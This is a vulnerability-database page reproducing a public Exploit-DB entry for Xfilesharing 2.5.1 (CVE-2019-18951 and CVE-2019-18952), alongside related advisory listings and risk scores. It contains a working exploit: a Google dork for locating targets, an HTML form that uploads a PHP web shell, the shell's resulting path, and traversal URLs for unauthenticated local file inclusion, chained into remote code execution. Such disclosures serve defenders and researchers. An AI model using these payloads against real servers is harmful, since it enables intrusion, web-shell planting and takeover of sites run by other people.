Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Xfilesharing 2.5.1 - Arbitrary File Upload

🗓️ 14 Nov 2019 00:00:00Reported by Noman RiffatType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 459 Views

Xfilesharing 2.5.1 Arbitrary File Upload and Local File Inclusio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Xfilesharing 2.5.1 - Arbitrary File Upload Vulnerability
14 Nov 201900:00
zdt
ATTACKERKB		CVE-2019-18952
13 Nov 201900:00
attackerkb
Circl		CVE-2019-18951
17 Jun 202100:48
circl
Circl		CVE-2019-18952
6 Feb 202520:43
circl
CNVD		SibSoft Xfilesharing File Upload Vulnerability
14 Nov 201900:00
cnvd
CNVD		SibSoft Xfilesharing Directory Traversal Vulnerability
14 Nov 201900:00
cnvd
CVE		CVE-2019-18951
13 Nov 201922:38
cve
CVE		CVE-2019-18952
13 Nov 201922:38
cve
Cvelist		CVE-2019-18951
13 Nov 201922:38
cvelist
Cvelist		CVE-2019-18952
13 Nov 201922:38
cvelist
Rows per page
# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
# Google Dork: inurl:/?op=registration
# Date: 2019-11-4
# Exploit Author: Noman Riffat
# Vendor Homepage: https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952

#####################
Arbitrary File Upload
#####################

<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
    <input type="text" name="sid" value="joe">
    <input type="file" name="file">
    <input type="submit" value="Upload" name="submit">
</form>

Shell : http://xyz.com/cgi-bin/temp/joe/shell.php

####################
Local File Inclusion
####################

http://xyz.com/?op=page&tmpl=../../admin_settings

This URL will fetch "admin_settings.html" template without any authentication. The ".html" extension is hard coded on the server so the included file must be with html extension anywhere on the server. You can even merge LFI with Arbitrary File Upload vulnerability by uploading an html file i.e. "upload.html" and changing the "sid" to "../../../../../../tmp" and so the file gets uploaded in tmp directory of the server. Now you can include the file like following.

http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload

The Xfilesharing script has builtin shortcodes as well so you can achieve RCE by including them in that "upload.html" file.

Noman Riffat, National Security Services Group Oman
@nomanriffat, @nssgoman

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Nov 2019 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 27.5
CVSS 3.19.8
EPSS0.84694
arbitrary file uploadlocal file inclusionxfilesharing 2.5.1cve-2019-18951cve-2019-18952noman riffatnational security services group.
459